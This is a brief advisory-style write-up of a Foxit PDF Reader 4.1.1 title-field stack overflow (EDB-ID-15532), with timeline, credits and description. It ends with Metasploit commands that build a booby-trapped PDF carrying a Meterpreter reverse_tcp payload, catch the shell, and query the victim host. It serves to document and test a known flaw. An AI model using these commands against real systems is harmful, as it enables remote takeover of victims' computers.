EDB-ID-15532 : Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow

Timeline :

Vulnerability reported to vendor by offsec before the public release on Exploit-DB
Vendor released new version the 2010-09-29
dookie & Sud0 exploit release on Exploit-DB the 2010-11-13
Metasploit exploit released the 2010-11-22

PoC provided by :

dookie
Sud0
corelanc0d3r
jduck

Reference(s) :

EDB-ID-15532

Affected version(s) :

Foxit PDF Reader prior to version 4.2.0.0928

Tested on Windows 7 Integral with :

Foxit PDF Reader 4.1.1.0805

Description :

This module exploits a stack buffer overflow in Foxit PDF Reader prior to version 4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that contains an overly long string in the Title field. This results in overwriting a structured exception handler record. NOTE: This exploit does not use javascript.

Commands :

use exploit/windows/fileformat/foxit_title_b­of
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sysinfo
getuid